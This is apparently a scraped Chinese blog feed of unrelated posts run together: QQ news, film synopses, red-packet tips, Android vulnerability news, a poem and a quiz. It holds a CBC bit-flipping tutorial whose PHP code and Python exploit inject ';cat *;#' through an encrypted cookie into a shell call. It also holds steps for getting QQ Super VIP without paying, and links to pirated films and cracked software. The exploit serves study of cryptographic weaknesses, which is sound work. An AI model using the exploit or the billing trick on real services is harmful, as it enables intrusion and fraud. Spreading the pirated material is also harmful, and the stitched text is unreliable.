手机QQ打开  http://imgcache.qq.com/club/act/2015/56835/index.html?SNO=1440088934428&uin=78787&_wv=1&clubStatus=4&ADTAG=vipcenter

QQ宣布了QQ群开放的消息，办公、游戏和教育类的应用，是QQ群开放后鼓励的三个方向。这可能是QQ发展史上最为重要的一次开放。
微信做连接，QQ做移动社群
微信+朋友圈+订阅号，通过广点通、赞赏和外接广告获取收入;那么QQ则是QQ群+兴趣部落+订阅号，通过QQ群支付，部落打赏获得收入。
使用手机QQ的用户，超过半成以上是90后和00后用户。70后、80后们在用微信聊天，刷朋友圈，看微信订阅号;90后、00后们在用QQ聊天，组成QQ群，加入各种兴趣部落，群主和酋长们再用QQ订阅号来触达(push)用户。
2014年，QQ找到了自己新的定位以及与微信的差异化：年轻。2015年，QQ寻求年轻人之上的生态建设：月活3.8亿的qq群、20万兴趣部落，以及 内测中的QQ订阅号，共同构成QQ的三驾马车。同时，QQ将开放QQ群的关系链、消息触达和支付能力，允许开发者接入应用，鼓励酋长通过打赏获得收入。
同样实现5亿用户，微信用了4年，而QQ用了十几年。
在近日的腾讯移动社群峰会上，腾讯高级执行副总裁汤道生表示，在今年三季度或四季度，QQ将推出公众号服务，形成以“群＋应用＋兴趣部落＋公众号”的QQ社群体系。

[caption id="attachment_374" align="aligncenter" width="393"] [科幻片] [在线/下载][高清]机器人帝国[/caption] 

导演: 乔·怀特
编剧: 乔·怀特 / Mark Stay
主演: 吉莲·安德森 / 本·金斯利 / 卡兰·麦克奥利菲 / 杰拉丁妮·詹姆斯 / 斯蒂文·麦金托什 / 更多...
类型: 动作 / 科幻 / 冒险
制片国家/地区: 英国
语言: 英语
上映日期: 2015-03-27(英国)
片长: 90分钟
又名: Our Robot Overlords
剧情简介  ·  ·  ·  ·  ·  ·
三年前，外星机器人入侵地球，经过七天的战斗地球被完全占领。从此之后，机器人对人类严加看管，它们向人类头上安装了定位系统，一旦检测到人类走出家门便将其毁灭。除此之外，外星人雇佣罗宾（本·金斯利 Ben Kingsley 饰）等人类叛徒担任辅助管理工作。罗宾迷恋美丽的妇人凯特（吉莲·安德森 Gillian Anderson 饰），但凯特只痴心等待失踪的丈夫归来。罗宾口口声声称凯特的丈夫早已遇害，不过她的儿子西恩（Callan McAuliffe 饰）并不相信，男孩始终未放弃寻找父亲的努力。某天，西恩意外和康纳（Milo Parker 饰）等伙伴发现令定位系统失效的办法。
孩子们尝试着走出家门，这一变故也让推翻机器人的统治成为可能…

（下载后，请把拓展名MP41改成MP4即可）
720P链接：http://pan.baidu.com/s/1bnjUOJd 密码：4s1x
1080P链接：http://pan.baidu.com/s/1sjuXIR7 密码：yx7n

淘宝买的，买到后感觉没啥用处，而且楼主也没空间。。。分享给需要的朋友。

开过网店的应该都知道，尤其是卖虚拟商品的朋友！卡密自动发货是必不可少的技能，比较有名的像闪点卡密、第五代等等……

据宝贝详情：
升级内容：
增加“黑名单”菜单，添加买家ID后该买家无法提货；
增加卡密形式查看方式，按宝贝查看，方便管理卡密，显示该宝贝已发卡密、未发卡密及全部库存数量；
增加卡密按宝贝查看导出已发、未发及全部库存为txt文本；
增加一键删除该宝贝的卡密库存；
修复前台提取页面显示下载地址中空格为+号问题。
修复发货记录中IP地址显示不完整的问题;
修复发货记录信息量过大显示不完整的问题。
删除宝贝的同时删除此宝贝相关的卡密和下载;
修复导入mysql.txt数据出错问题。

你们自己好好搞吧，有什么问题不要问我，我也不懂~
请各位朋友多多评分，积分留在手里不用就浪费了。
楼主想要升级用户组，评分！！！
链接: http://pan.baidu.com/s/1hquAl5E 密码: 577d

1，【法尔胜】，回复“红包，每天3次机会，截止23日

2，【cc卡美珠宝】，18日8点回复七夕，截止20日

3，【建水摩卡小镇】，18日9:10点击菜单栏有奖活动-每日红包，每天300个

4，【好好租】，18日10点点击菜单栏抢红包，截止20日

5，【西欧汇馆】，每天中午12:00点击菜单栏每日红包

6，【爱一夏音乐节】，18日16点回复我要红包，每天1000元，截止8月21日

7，【承德香江家居品牌工厂批发城】，18日17点回复XJ，点击推送，转发给朋友可再得红包，截止28日

9，【长兴·星城】，18日-26日每晚19:00开始，每天一场，每场发放2000多个同享红包，还可以分裂出6000多个红包

10，【昆明人民路壹号广场】，17日20点点击菜单

11，【大新百汇】，18日20:30回复红包，截止19日

12，【家在宁波网】，18日14:00回复博府丽景湾

13，【心意点点】，点击历史消息第一条-我拿红包

14，【分众专享】，点击菜单栏：有钱大家赚，18日6000个微信红包

15，萝卜玩app下载以及准点送微信红包，详情见其公众号

16，【医事帮帮忙 】，首页发表问题，切换到小号，回答问题，前一个微信号会收到答案，选择采纳提问时要使用5元优惠券，即0元提问，时间选择1天内，次日到余额可提现

17，【诸葛理财】，点击菜单栏七夕礼物

18，【CFYIDONG意动】，回复砸金蛋，每天两次机会

19，【长城人寿】回复长城幸运星后得流量，18日，25日可以累积领取

20，【爱游戏】，点击推送链接，第一次抽奖领取同程红包后第二次抽有机会得红包，截止8.28

1,  微信打开链接。http://wap.newnewbank.com/userRegister.html

2，点击app【个人中心】-【账户设置】完成实名认证

3，点击app【首页】，找到幻灯图片（拉上好友抢现金）这个进入活动页面，并点击邀请好友奖励记录

4，点击领取那个5元即可，奖励实时到账，现在可以去绑定银行卡提现了。

5，这时它会送你特权金4000元，你就进去投资即可，到期收益7块多。也可以提现。

导演: 梁乐民 / 陆剑青
编剧: 梁乐民 / 陆剑青
主演: 张学友 / 张家辉 / 余文乐 / 王学圻 / 池珍熙 / 更多...
类型: 剧情 / 动作 / 悬疑 / 犯罪
制片国家/地区: 香港
语言: 汉语普通话 / 粤语 / 韩语 / 英语
上映日期: 2015-04-30(中国大陆/香港)
片长: 119分钟
又名: 大峡谷 / 赤盗 / Helios
IMDb链接: tt3614922
赤道的剧情简介 · · · · · ·
韩国秘密核武器神秘失踪，同时载着军方手提装置的飞机在境内坠毁。韩方接到消息，一名绰号“赤道”的国际通缉犯（张震 饰）带着助手“信差”（文咏珊 饰）将于本港实行秘密武器交易，韩国武器专家崔民号（池珍熙 饰）与特工朴宇哲（崔始源 饰）奉命前往调查。本港反恐特勤组主管李彦明（张家辉 饰）与督察范家明（余文乐 饰）协助韩方寻找武器，而核物理教授肇志仁（张学友 饰）也受邀协助判案。武器很快被寻回，没想到竟还隐藏着潜在危机。正当香港及韩国警方决定送还武器回韩国之际，安全局高管（王学圻 饰）带着助手袁小姐（冯文娟 饰）突然出现，三方陷入周旋之中，“赤道”一伙更进一步的阴谋也开始实施……

介绍完毕 。。。放连接

【下载地址】

BD1280高清国粤双语中字.mp4

BD1280超清国粤双语中字.mp4

8月17日消息，安卓系统最近可谓是风声不断，除了Trend Micro(杀毒软件)公司在7月份发现的“Stagefright”和“Mediaserver”两大Android漏洞，今天该公司又公布，新发现了安卓的两个新的薄弱点。

一个薄弱点是CVE-2015-3839，如果黑客利用CVE-2015-3839，将带有恶意代码的信息插入到安卓的信息执行程序中，那么虽然设备整体不会出现什么问题，但是信息执行应用就会受到攻击，从而导致不能收发短信。

另 外一个薄弱点是CVE-2015-3840，这种漏洞可能会改变收发短信和彩信等的显示日期以及收发状态。如此一来，用户的隐私信息就得不到保护。如果攻 击者利用恶意应用，来监视使用者的信息，并进行修改，那么用户的短信就会被自动发送，如果发送到会产生高额费用的号码上，就会引起用户不必要的损失。

这两个安卓漏洞均存在于信息组件之中，从而使安卓整体版本受到影响。据说Trend Micro已经将相应情况报告给了谷歌。除了以上两个漏洞外，以下还有最近曝光率很高的几个重要漏洞：

Stagefright漏洞：

影响安卓2.2到5.1.1之间的所有系统版本，黑客可以通过一段包含特定格式编码信息的文件，可以在用户没有察觉的情况下，神不知鬼不觉的“黑”掉电话，窃取用户信息，甚至导致设备变砖。

Certifi-gate漏洞：

所有的OEM厂商可能都受到了感染，它让第三方程序插件通过Remote Support得到存取权限，控制设备的屏幕和使用OEM发出的授权证书。

mediaserver漏洞：

安卓4.3到5.1.1所有版本，mediaserver在处理畸形MKV文件时，在实现上存在整数溢出漏洞，远程攻击者通过恶意的安卓app或构造的网站，利用此漏洞可造成受影响设备不响应，无法接打电话。

0day漏洞：

这个漏洞存在于安卓系统中Google Admin应用程序处理一些URL的方式中，攻击者甚至可以通过这个漏洞绕过沙箱机制。

目前安卓系统用户数量激增，难免会成为黑客门攻击的对象，相关漏洞的曝光也会愈发频繁和密集。大家也要密切关注并及时升级更新，以保证自身数据和信息安全。

第一步：用自己的手机绑定号要刷的QQ号码！
第二步：编辑短信：SVIP13 发送到 10661700（等待消息，会比较慢，
5-8分钟左右，“您即将定制由深圳腾讯公司提供的QQ超级会员2013计划抢先体验版，回复“是”订购！ ：10661700”，这是回复“是”！）
第三步：打开网址：http://bd.qq.com/bind.shtml
（解除手机绑定！记住，一定要快！要在开通超级会员成功这条信息发过来之前解除成功！这一步至关重要）
第四步：解除成功，随后“您已成功定制由腾讯……”这条信息就会来，然后发送0000到10086！如果没有业务，就成功一半了！
第五步：打开网址：http://bd.qq.com/bind.shtml（绑定自己刚刚刷超级会员的手机号码！成功后就OK！）
第六步：恭喜你，永久超级会员刷取成功

简单说下本教程可以实现效果

操作方法如下

导演: 郑保瑞
编剧: 黄英 / 梁礼彦
主演: 吴京 / 托尼·贾 / 张晋 / 任达华 / 卢惠光 / 更多...
类型: 剧情 / 动作 / 犯罪
制片国家/地区: 香港 / 中国大陆
语言: 汉语普通话
上映日期: 2015-06-18(中国大陆)
片长: 120分钟
又名: 杀破狼2之杀无赦 / SPL 2: A Time For Consequences
IMDb链接: tt3197766
杀破狼2的剧情简介 · · · · · ·
香港卧底探员志杰（吴京 饰）不惜变成瘾君子，潜伏犯罪集团侦查幕后主脑洪先生（古天乐 饰）；直属上司兼叔父华哥（任达华 饰）决定终止行动，志杰却身份败露且人间蒸发。华哥违抗命令私自搜寻，辗转得悉志杰已被关进泰国某监狱，遂只身前赴营救。
泰国警察阿猜（托尼·贾 饰）为筹钱医 治患血癌的女儿转任狱警，负责看管志杰。志杰与阿猜语言不通、身份对立，却竟是唯一可拯救阿猜女儿的骨髓捐赠者，阿猜必须保住志杰的性命；但狱长（张晋 饰）为确保幕后交易运作正常，必须铲除志杰。
身体虚弱的洪先生带同胞弟（恭硕良 饰）突然出现，准备进行心脏移植手术自救；原来整个监狱是洪先生操控的活人体器官供应市场……

【下载地址】


HD1280高清国语中字.mp4

HD1280超清国语中字.mp4

0x00 译者前言

本文翻译自：http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/

drops里的相关主题文章：使用CBC比特反转攻击绕过加密的会话令牌
缘起是糖果出的一道题，看到原文作者对这一问题阐述的较为详细，虽然时间有些久远，但翻译一下可与诸君学习一下思考问题的方法。

0x01 相关介绍

此攻击方法的精髓在于：通过损坏密文字节来改变明文字节。（注：借助CBC内部的模式）借由此可以绕过过滤器，或者改变用户权限提升至管理员，又或者改变应用程序预期明文以尽猥琐之事。

首先让我们看看CBC是如何工作的，（作者很懒所以）更多细节你可以看这里：wiki
在这里只是解释一下关于攻击必须要理解的部分。（即：一图胜千言）

加密过程

Plaintext：待加密的数据。

IV：用于随机化加密的比特块，保证即使对相同明文多次加密，也可以得到不同的密文。

Key：被一些如AES的对称加密算法使用。

Ciphertext：加密后的数据。

在这里重要的一点是，CBC工作于一个固定长度的比特组，将其称之为块。在本文中，我们将使用包含16字节的块。

因为作者讨厌高数（和译者一样），所以作者造了一些自己的公式（方便记忆）：
•Ciphertext-0 = Encrypt(Plaintext XOR IV)—只用于第一个组块
•Ciphertext-N= Encrypt(Plaintext XOR Ciphertext-N-1)—用于第二及剩下的组块

注意：正如你所见，前一块的密文用来产生后一块的密文。

Decryption Process

•Plaintext-0 = Decrypt(Ciphertext) XOR IV—只用于第一个组块
•Plaintext-N= Decrypt(Ciphertext) XOR Ciphertext-N-1—用于第二及剩下的组块

注意：Ciphertext-N-1（密文-N-1）是用来产生下一块明文；这就是字节翻转攻击开始发挥作用的地方。如果我们改变Ciphertext-N-1（密文-N-1）的一个字节，然后与下一个解密后的组块异或，我们就可以得到一个不同的明文了！You got it?别担心，下面我们将看到一个详细的例子。与此同时，下面的这张图也可以很好地说明这种攻击：

0x02 一个例子（CBC Blocks of 16 bytes）

比方说，我们有这样的明文序列：

a:2:{s:4:"name";s:6:"sdsdsd";s:8:"greeting";s:20:"echo 'Hello sdsdsd!'";}

我们的目标是将“s:6”当中的数字6转换成数字“7”。我们需要做的第一件事就是把明文分成16个字节的块：
•Block 1:a:2:{s:4:"name"; •Block 2:s:6:"sdsdsd";s:8 •Block 3::"greeting";s:20 •Block 4::"echo 'Hello sd •Block 5:sdsd!'";} 因此，我们的目标字符位于块2，这意味着我们需要改变块1的密文来改变第二块的明文。

有一条经验法则是（注：结合上面的说明图可以得到），你在密文中改变的字节，只会影响到在下一明文当中，具有相同偏移量的字节。所以我们目标的偏移量是2：
•[0] = s
•1 = :
•2 =6

因此我们要改变在第一个密文块当中，偏移量是2的字节。正如你在下面的代码当中看到的，在第2行我们得到了整个数据的密文，然后在第3行中，我们改变块1中偏移量为2的字节，最后我们再调用解密函数。
1.$v = "a:2:{s:4:"name";s:6:"sdsdsd";s:8:"greeting";s:20:"echo 'Hello sdsdsd!'";}";
2.$enc = @encrypt($v);
3.$enc[2] = chr(ord($enc[2]) ^ ord("6") ^ ord ("7"));
4.$b = @decrypt($enc);

运行这段代码后，我们可以将数字6变为7：

但是我们在第3行中，是如何改变字节成为我们想要的值呢？

基于上述的解密过程，我们知道有，A = Decrypt(Ciphertext)与B = Ciphertext-N-1异或后最终得到C = 6。等价于：
A = B XOR C
最后，A XOR B XOR C等于0。有了这个公式，我们可以在XOR运算的末尾处设置我们自己的值，就像这样：

A XOR B XOR C XOR "7"会在块2的明文当中，偏移量为2的字节处得到7。

下面是相关原理实现的PHP源代码：

define('MY_AES_KEY', "abcdef0123456789"); function aes($data, $encrypt) { $aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, ''); $iv = "1234567891234567"; mcrypt_generic_init($aes, MY_AES_KEY, $iv); return $encrypt ? mcrypt_generic($aes,$data) : mdecrypt_generic($aes,$data); } define('MY_MAC_LEN', 40); function encrypt($data) { return aes($data, true); } function decrypt($data) { $data = rtrim(aes($data, false), "\0"); return $data; } $v = "a:2:{s:4:\"name\";s:6:\"sdsdsd\";s:8:\"greeting\";s:20:\"echo 'Hello sdsdsd!'\";}"; echo "Plaintext before attack: $v\n"; $b = array(); $enc = array(); $enc = @encrypt($v); $enc[2] = chr(ord($enc[2]) ^ ord("6") ^ ord ("7")); $b = @decrypt($enc); echo "Plaintext AFTER attack : $b\n";
0x03 一个练习

光说不练假把式，接下来作者举了一个他参加过的CTF中的一道题目的例子（更多详情可以参阅最后的相关参考链接），然后阐述了他是怎样在最后几步中打破CBC的。

下面提供了这个练习当中很重要的一部分源码：

首先作者添加了一个字符"X"，通过CBC翻转攻击将其替换成一个单引号，然后;cat *;命令将被执行，最后的#是用来注释，确保函数escapeshellarg()插入的单引号不会引起其他问题；因此我们的命令就被成功执行啦。

在计算好之前的密码块中，要被改变的字节的确切偏移量（51）后，作者通过下面的代码来注入单引号：

然后作者通过改变cookie（因为其具有全部的密文），得到以下结果：

首先，因为我们改变了第一块，所以在第二块中，黄色标记的"X"被成功替换为单引号，它被认为是多余插入（绿色），导致在unserialize()处理数据时产生一个错误（红色），因此应用程序甚至都没有去尝试执行注入了。

如何完善

我们需要使我们的注入数据有效，那么我们在第一块中得到的额外数据，就不能在反序列化的过程中造成任何问题（unserialize()）。一种方法是在我们的恶意命令中填充字母字符。因此我们尝试在注入字符串前后填充多个'z'：

在发送上述字符串后，unserialize()并没有报错，并且我们的shell命令成功执行！！！

0x04 相关参考

1.CRYPTO #2: http://blog.gdssecurity.com/labs/tag/crypto
2.http://codezen.fr/2013/08/05/ebctf-2013-web400-cryptoaescbchmac-write-up/
3.http://hardc0de.ru/2013/08/04/ebctf-web400/

0x05 附录代码

下面是上面练习当中的PHP源码及exp：

•PHP code:
ini_set('display_errors',1); error_reporting(E_ALL); define('MY_AES_KEY', "abcdef0123456789"); define('MY_HMAC_KEY',"1234567890123456" ); #define("FLAG","CENSORED"); function aes($data, $encrypt) { $aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, ''); $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($aes), MCRYPT_RAND); $iv = "1234567891234567"; mcrypt_generic_init($aes, MY_AES_KEY, $iv); return $encrypt ? mcrypt_generic($aes, $data) : mdecrypt_generic($aes, $data); } define('MY_MAC_LEN', 40); function hmac($data) { return hash_hmac('sha1', data, MY_HMAC_KEY); } function encrypt($data) { return aes($data . hmac($data), true); } function decrypt($data) { $data = rtrim(aes($data, false), "\0"); $mac = substr($data, -MY_MAC_LEN); $data = substr($data, 0, -MY_MAC_LEN); return hmac($data) === $mac ? $data : null; } $settings = array(); if (@$_COOKIE['settings']) { echo @decrypt(base64_decode($_COOKIE['settings'])); $settings = unserialize(@decrypt(base64_decode($_COOKIE['settings']))); } if (@$_POST['name'] && is_string($_POST['name']) && strlen($_POST['name']) < 200) { $settings = array( 'name' => $_POST['name'], 'greeting' => ('echo ' . escapeshellarg("Hello {$_POST['name']}!")), ); setcookie('settings', base64_encode(@encrypt(serialize($settings)))); #setcookie('settings', serialize($settings)); } $d = array(); if (@$settings['greeting']) { passthru($settings['greeting']); else { echo "

\n";
}
?>
 

Exploit:

#!/usr/bin/python
import requests
import sys
import urllib
from base64 import b64decode as dec
from base64 import b64encode as enc
 
url = 'http://192.168.184.133/ebctf/mine.php'
 
def Test(x):
    t = "echo 'Hello %s!'" % x
    s = 'a:2:{s:4:"name";s:%s:"%s";s:8:"greeting";s:%s:"%s";}%s' % (len(x),x,len(t),t, 'X'*40)
    for i in xrange(0,len(s),16):
        print s[i:i+16]
    print '\n'
 
def Pwn(s):
    global url
    s = urllib.quote_plus(enc(s))
    req = requests.get(url, cookies = {'settings' : s}).content
 #   if req.find('works') != -1:
    print req
  #  else:
   #     print '[-] FAIL'
 
def GetCookie(name):
    global url
    d = {
        'name':name,
        'submit':'Submit'
    }
    h = requests.post(url, data = d, headers = {'Content-Type' : 'application/x-www-form-urlencoded'}).headers
    if h.has_key('set-cookie'):
        h = dec(urllib.unquote_plus(h['set-cookie'][9:]))
        #h = urllib.unquote_plus(h['set-cookie'][9:])
        #print h
        return h
    else:
        print '[-] ERROR'
        sys.exit(0)
 
#a:2:{s:4:"name";s:10:"X;cat *;#a";s:8:"greeting";s:24:"echo 'Hello X;cat *;#a!'";}
#a:2:{s:4:"name";
#s:10:"X;cat *;#a
#";s:8:"greeting"
#;s:24:"echo 'Hel
#lo X;cat *;#a!'"
#;}
 
#a:2:{s:4:"name";s:42:"zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz";s:8:"greeting";s:56:"echo 'Hello zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz!'";}
#a:2:{s:4:"name";
#s:42:"zzzzzzzzzz
#zzzzzzzX;cat *;#
#zzzzzzzzzzzzzzzz
#";s:8:"greeting"   
#;s:56:"echo 'Hel
#lo zzzzzzzzzzzzz
#zzzzX;cat *;#zzz
#zzzzzzzzzzzzz!'"
#;}
#exploit = 'X' + ';cat *;#a' #Test case first, unsuccess
exploit = 'z'*17 + 'X' + ';cat *;#' + 'z' *16 # Test Success
 
#exploit = "______________________________________________________; cat *;#"
#Test(exploit)
cookie = GetCookie(exploit)
pos = 100; #test case success
#pos = 51; #test case first, unsuccess
val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos]))
exploit = cookie[0:pos] + val + cookie[pos + 1:]
Pwn(exploit)
 
            

这个活动是腾讯目前付费把免费QQ号码转为靓号的活动，点亮QQ上的靓字。

当然了 仅限 5~8位QQ参与，不排除以后推出9~10位QQ号码参与的可能性。毕竟赚钱在节操面前是不值一提的。
有钱的土豪放心转，目前规则看 号码不会永久转为靓号，仅点亮靓字，到期后自动变普通QQ。

活动地址：http://www.iqshw.com/qqnews/2015/0708/97860.html

- 阅读剩余部分 -

2015年8月6日到8月9日，全球安全领域的顶级大会DefCon即将在美国的拉斯维加斯举办，有超过7000名黑客和安全专家参加这一盛会，参会者除来自世界各地黑客，还有全球许多大公司的代表以及美国国防部、联邦调查局、国家安全局等政府机构的官员，影响巨大，来自中国的安全研究团队360UnicornTeam的三大研究议题，将受邀在DEFCON上演讲。

DEFCON黑客大会是黑客们结识朋友以及展示实力扬名立万的国际平台，每年的大会上都有精彩的技术演讲，这些技术演讲代表这安全流域的最新方向，也是本年度最热门的安全研究方向。

从DEFCON官方发布的大会议程看，今年的议题中有“如何破解特斯拉Model S”，“如何用USB破解Wi-Fi通信”，值得关注的是来自中国360Unicorn Team的杨卿、单好奇和黄琳等5位安全研究人员也将在大会上做精彩演讲。

未授权情况下控制ZigBee设备、GPS位置欺诈和飞蜂窝小型基站劫持是5位中国安全研究人员将在DEFCON上的三大演讲议题。其中低成本GPS欺诈是360Unicorn Team的最新研究成果，他们研究发现通过GPS欺诈手段可能控制汽车、飞机等依赖于GPS导航数据的应用，被不法分子利用有可能制造民用航空、海陆交通系统、金融系统的大型混乱。在8月底的HackPWN安全极客狂欢节上，360Unicorn Team还将演示利用GPS位置欺诈来控制无人机的飞行。

除了议题演讲，DEFCON还有高水平的黑客技术竞赛，全球范围网络安全圈流行的竞赛形式——夺旗赛(CTF-Capture The Flag)正是起源于DefCon大会，至今仍是DefCon的核心竞赛之一，夺旗赛中黑客们分组对战获取网络根服务，击败对手将其拉下马，去年，中国参赛团队也在这一比赛中取得了较好成绩。

若水长天今何来，一剪情丝一剪债。落花逐影两遂意，空赋红尘叹沉海。
------------题记
发如锦，锦丝乱，梦无眠，月坠星河湾。草碧舞幽梦，寂夜水无澜，天各一方，云水巫山。谁是谁的天涯？谁是谁的望眼欲穿！梦太凉、凉到了不想入睡；情太长、长到了天各一方；路太远、远到了无法丈量；缘太浅、浅到了两不相欠；字太疼，疼到了落笔无言；爱太重，重到了无处安放。

爱情是一生中最美的画面，不管风雨过后，谁会留在谁的身边，一刻已经永恒、一念就是沧海桑田，纵有千般不甘，也难抵现实的牵绊。你有你的春天，我有我的险滩，让专注的眼锁定天空的蓝，你的快乐我的心愿，尽管你的幸福已经于我无关。生命里最美的时光，是安静下来把脚步放慢，让分秒在指尖回响，一曲音落一梦地老天荒。有很多人问过我同样的问题：你的笔似乎是随意流淌的溪水，无法预测，取之不尽用之不竭。其实每天会写什么自己根本不知道，你在赏我亦在看。记忆清零，笔随着音乐游走，字落哪方、不去端详。黄昏的寂静是我喜欢的，几只麻雀在院子里飞来飞去，根本不怕人，小狗乖乖的趴着纳凉。我就躺在摇椅上，随音乐思绪飞扬，一杯咖啡从烫饮到凉。如此安逸，时光静好，生命就像有了落脚的地方。红尘的道场，于我已经成了隔空离世的远方……

生活总是有那么多意外，趁还可以行走，就让脚步奔赴想看的每一寸土地。我是孤独的，当学会了爱自己，才知道有些已经来不及。梦醒了，现实就来了。在虚无的梦境里打坐，在残酷的现实里诵经。若你想我了，就看看月亮的眼睛，那千言万语的叮咛，都挂在无垠的星空。若子夜无梦，就让思念无声、听听蝉吟蛙鸣。欲罢不能的瘾，止于现实的疼，伤有千百回，回首往事风。我不敢爱了，你却在了。是讽刺还是凌迟？一种心情，一个虚无缥缈的幻境。无法做到云淡风轻，却已堪破四大皆空。

且将雨落赠东风，半江春色半江冷。“倘若东风未嫁人，百花依旧不负卿”。这后两句是哥们线线给我续的，甚是喜欢。空间卧虎藏龙，高手云集，只是随手抛了砖，就引来好多清水落玉。我不懂格律词牌，亦没有去学，不想被条条框框约束捆绑着，落笔只是随性的打油诗，这不是什么秘密，老友都知道。

微醉云吞朗月时，不曾谋面心先老。落墨相思无从寄，徒留残生雪中烧。偶尔会是颓废的，就慵懒如斯，浅寐间魂魄飘摇，不能落脚。会有泪顺着眼角淌下，却不知缘由，只是心会很疼，然后呆呆的凝望一朵云，一窠草，陷入空灵。不管东风是否嫁人，百花都会应了时节，香十里东风韵味，媚一瞬地久天长。“负”这个字染了疼，是亏欠，不止是对方也包括自己，细细算来，于自己更多。欠了别人的，总被记挂着，自己的略之不念罢了！或早或晚的相逢，都是上辈子未了的情，今生或深或浅的小聚，散了别抱怨，给不了的肩膀，只是一个驿站而已。彼此沦为过客，却有回忆永恒。

没有任何一段感情是双赢的，“不欠东风一缕香”，那是安慰自己内心波涛汹涌的托词，只是有人不追究，自己找个放过心魔的暗示。不去赌了，那些虚无化骨的情丝，不能修成正果，还会要了命，那远离吧，有毒的不再靠近。已经被孤独打败，沉溺其中，水平如镜，别惊扰这来之不易的安宁，许我向你看、然后向后转！累了，休整，无法修成正果的浮生，就修清风绕肩心不乱，雪花漫天不醉眼。我是谁不重要，安流年于指尖，沉飘萍于无忧……

资源是找来的 ，不存在推广，想了解喜欢的朋友下载吧

也不要讲图呢？视频呢？凭靠自己的创意做。

教程有，

手绘视频的崛起：手绘视频是最近在国外兴起的非常火爆的营销利器，目前在国内掌握这项技术的人可以说是凤毛麟角，现在学习这项技术，正是最好的时机。手绘视频可以应用在网络营销的各种环节，比如收集客户名单；做产品或服务的介绍；或是做个人品牌宣传等。

操作简单 轻松卖东西

手绘视频是利用一只真实的手在视频中画出各种图像和文字，制作出的视频极具吸引力，能充分吸引观看者的注意力，让视频中表达的内容更容易被观看者接受，大幅提高转化率,是目前效果最好的营销型视频。

如果你是初学者，包教包会，帮助你快速入门，能做手绘

视频。随时帮你解决安装软件以及学习中碰到的各种问

题。软件和资料可以拷贝我的，但是服务和手绘知识拷贝

不了我的。教程和素材不断更新，提供特效，擦除物体，

一般图片转SVG格式解决办法

手绘视频软件和教程

手绘视频软件是完美破解版，大量的手势和素材可以使用，完美解决软件问题，完全能解决软件方面的问题，教程有旧版的软件教程，有新版的菜单介绍。解决中文输入问题，解决特效问

链接: http://pan.baidu.com/s/1gd6HiCj 密码: yhj4

你或你的女朋友还在玩血型测性格、星座测性格吗？告诉你，你们凹凸曼了。继前段时间日本推出“乳晕形状测性格”之后，网上又诞生一种内裤种类测性格的大法。也就是说你的内裤早已暴露了你的性格，穿什么样式的裤衩，注定就会是什么样的脾性，据说非常准，请小伙伴们对号入座。部分裤衩女生才能测，请把它转发给你的女神或者女朋友。
三角裤：自信且挑剔
你喜欢和别人不一样，生活里好多细节你都有自己的坚持，对一切持有怀疑态度。
丁字裤：高颜值小婊砸
你外表高冷，但内心激烈。你肯定长的挺好看的，而且还挺友好，起码大家表面上都愿意和你玩。
平角裤：容易内伤的类型
你比较沉默，但你一开口就能冷翻全场。可是，有几个人能懂你火热的内心呢？
大裤衩：已看透人生
你很实际，不太喜欢变化。你特别擅长处理人际关系，不容易冲动，生活中很多事会让你感到无奈。
高腰裤：爱谁谁老娘不在乎
别人眼里你是特立独行的那种。你很有趣，但只有熟人才见过你的那一面。
平角裤衩：心思细腻的完美主义
你觉得世间一切都存在最合理的运行方式，你恨别人总是搞不懂这一点。没关系，世界放着等你来拯救。
卡通裤衩：好相处但不好欺负
你的内心一直逆龄生长。现实从来不会把你打败，只会让你更懂如何坚持自己。烦恼时太容易冲动。
三角裤衩：总被别人抱大腿
你太可靠了，太有责任感了没办法。你不用怎么太用力就很受大家欢迎，这可能是一种天生的气质。
光腚：敢想敢干豁的出去
真心话大冒险永远都选大冒险。谁都拦不住你那小鸟一样追求自由的心。希望你不是因为起痱子才光屁股的。

转存的同时请留下您的热心！
http://pan.baidu.com/s/1VZci
9fxt